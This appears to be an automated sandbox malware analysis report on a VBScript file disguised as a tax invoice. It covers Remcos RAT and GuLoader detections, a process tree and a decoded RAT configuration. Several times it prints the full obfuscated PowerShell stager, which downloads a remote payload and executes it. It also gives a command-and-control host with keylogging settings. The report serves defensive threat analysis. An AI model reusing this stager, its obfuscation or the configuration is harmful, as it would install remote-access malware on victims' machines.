Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NTS_eTaxInvoice.html.vbs

Overview

General Information

Sample name:NTS_eTaxInvoice.html.vbs
Analysis ID:1522515
MD5:a1aeb49d80b16158b4b88efef30be753
SHA1:a7829f01f6a679b9016c1b192431a317827045b1
SHA256:adae16c4fe643a3093a6e2ac5329616ccc62d71725f208203869d90f08b3c6d1
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1264 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 1812 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' Und.>Ga.um ';$Garanti=Demissioner 'uns.dIBespiEUne hXNdend ';$Funktionens98='Zizit';$Klemskrue67='\Forsvarsundtagelsen.Non';Complimentable (Demissioner 'S,udv$pottegNonmulSkifeo kloebPolitaTer,ilph.ll:ForbrTSubpraEuphok VatttAlterrKommueUdr ag acuuBrn plPaahneDefinrStigmiHalssnD.langUn omsF rgro rrisrWar,odSolbanNeglei HjdenAgramgTilkr=Antik$Mutile Udfln FendvNonfa:blatta Frikp Klasp tetidGnat.aSkoletmonu aIndja+ Srej$SekssKColeglBetake C vimBe.risPiruekInd ur BekmuBambue erni6Hemap7 Asp, ');Complimentable (Demissioner ' Prmi$Q ibbgStenklFiletoI desbChambaUnderl Spec: ardRnonmoeLycopk rhebr ProleSkov eHazelr SatreIndbodSnoreenyh dsTungs= Eco,$ HjemD UdlaeStro rCologmIndsaoSampli Mimod ko,m1 loat0Affat8Refor.Bedris E prpJ.gtrlDehemi etabtSabia(Arbej$Uko lHHo edeAl,arnStok.r ,andy olvkUngp kunleae WiktlSub osBemalePrak rSlopl) Mold ');Complimentable (Demissioner 'Nedri[L.uwiNStatieAntictAqu n.FaintSAris,eSuccor BunkvSegm iSubimcMisdeeSkrivPSiffro arveiUnplunP,rtntForvrM aligaBed mndemisa,laasg,arneePregnrGeote]Meggy: Fors: NeutSD sjueProvocGanesuEncryrGuaiai ProltJou nyExcepPTankbrUdenooHu kat HymnoSummecTil aoForbrlPhen Garn=Under Dic,[ Es.iN Di peLn svtFrems. MispSca lieTitilc UdsuuTyk erNonneiColletalteryUd,ytPDegrarAnlgsoTilintdefiboP ogrcK.essoDet,clG lfdTWei hyIndh pObjeke.ebuk]Ordd,:Hjest:SubaqTBaglylGelatsRubin1 B,oa2Nerei ');$Dermoid108=$Rekreeredes[0];$Aalb=(Demissioner 'Hellm$ nbegg odralDentioLnsitbDrumrABlindl Picc:CommoMUdsena inden,etrauBoardSV,riae pndeRPteleSZo ch=Syntan BeeseAnatfW Knap-Tang oFremsbE samJLukkeERipplc Utalt Sema RadioS omsYFin,eS CajutGar iET,talm Klum.OsmetNF rskemol atRamni.AeridWClienEGiantB akeeCFnaddl afiriS aineCountNIndgrT urve ');Complimentable ($Aalb);Complimentable (Demissioner 'Unm n$ AandMAprjtaDiscon.igmouRos vsSurgeepolycrKl nisSpi l.NatioH PeaseKolibaProjed imike.lestr ochls Gulp[ semi$ami,aSBesluaMendicY erpcDe,eah.ammea HuserHaymiosuperfInferaParaprSuperi OplinC,priaCigarcSnavseBehagoBa liuCl,nksSalut]S veb=San t$ harCP eroo Fingn Oplav JudaeTaxabcAf ket Laici IntivTonetelactol taily acci ');$Bortkaldenes=Demissioner ' Run $KugleM evea SchonSubtruA tens edbeNoctirV.nstsEremi.UdsorDegenpowheatwToldanDescrlPilotoIsltpaSe.undTeor FSh rpiHajerl.ndlie rais(Sk ll$progrDHypoaeA wesr Ichtm RedioSlgegiBuddhdStor 1Pro u0 Komi8 For ,Supin$KloroTTripii spanl an asSamm.tA likaDisbunFortidSympts AntikL.mfaoCheunn.halat Sew.r Fas,o F,rsl SennlForlaeTabernForsk)Early ';$Tilstandskontrollen=$Taktreguleringsordning;Complimentable (Demissioner ' St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1632 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 3472 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000002.00000002.2370425818.000001D31006D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1788.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_1812.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc981:$b2: ::FromBase64String(
              • 0xb9db:$s1: -join
              • 0x5187:$s4: +=
              • 0x5249:$s4: +=
              • 0x9470:$s4: +=
              • 0xb58d:$s4: +=
              • 0xb877:$s4: +=
              • 0xb9bd:$s4: +=
              • 0x15f2e:$s4: +=
              • 0x15fae:$s4: +=
              • 0x16074:$s4: +=
              • 0x160f4:$s4: +=
              • 0x162ca:$s4: +=
              • 0x1634e:$s4: +=
              • 0xc21b:$e4: Get-WmiObject
              • 0xc40a:$e4: Get-Process
              • 0xc462:$e4: Start-Process
              • 0x16bc0:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", ProcessId: 1264, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.16.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1632, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NTS_eTaxInvoice.html.vbs", ProcessId: 1264, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Permit Billeted Livserfarent Magmatism #>;$Homologue='ensorrow';<#prossie Udryddelseslejrenes Interjectionalized jobannoncer Anstillelser Sdmefuldes Bakkeen #>;$Sledgehammered=$host.PrivateData;If ($Sledgehammered) {$Genanvendelser++;}function Demissioner($Unlaconic){$Conversations=$Unengaging+$Unlaconic.Length-$Genanvendelser;for( $Kanaljen=5;$Kanaljen -lt $Conversations;$Kanaljen+=6){$Cochleous+=$Unlaconic[$Kanaljen];}$Cochleous;}function Complimentable($centronucleus){ . ($Garanti) ($centronucleus);}$Convectively=Demissioner 'AdherMPinoco.ivinzDesiligene lRed,vlR.rria Limo/Mic.o5Efter.E oti0.itdo Phram(OdiniWPrvebiSyndin BrebdHid eo AdvewFlgeps Po s PaceN ialTSkygg Kursu1Mis a0Indle. Gstg0Super;Pr,va Asep WIndk,iHalvpn enat6Still4Anabl; Peri BlaanxOppeb6Smukt4Count;Filtr CuretrBasi vBedoe:Drypf1Flo e2Mando1Soran.Tipol0baggr)Spotm angstGPho.oekongec.eigekN,wfooR all/Tria 2Svmme0Sgeko1Telem0D ool0 Babe1rdk k0Marki1Recir B.jekFKaleniTrl grhypopeRehabfSkimtoOpht.x ffec/Ch om1Rund,2 Scut1 Ytre.Ripen0Undlb ';$Saccharofarinaceous=Demissioner ' PostUTek oSKanteESk ivRVan e-RiffiAMultigWeeklEmel oNIdiorT Pr.t ';$Dermoid108=Demissioner 'TzolkhWynketIndflt Ga.gpP.rsosForga:Secti/abern/FemdodHospir StariMoilsvKakkee Chup.DelafgDeflooRedero,endrg MonolFugtieArkiv.MedvicA,eneoKo,mumObskn/ ailluHarroc Ince?Mo emeErgasx LivspInobto Pu rr valetDruek= forsdFortroMatriwCon entillylGnat,oAngreaSo madgldsf&.uskeiParamdBacil= Nive1Pilloa fficJAnticrKapil3FremmEPrimrNKor,oUH,perZPa.acI BoucKFeatuKSkytsZnanziBTeks mHaircNSvineb AflgdFoame6Menedi MutaoSols.0 gtpbarr sC acco5DekupvSendesAlderIImmunIJazzo6KommuaOve.vL.aike1Antit ';$Henrykkelser=Demissioner ' 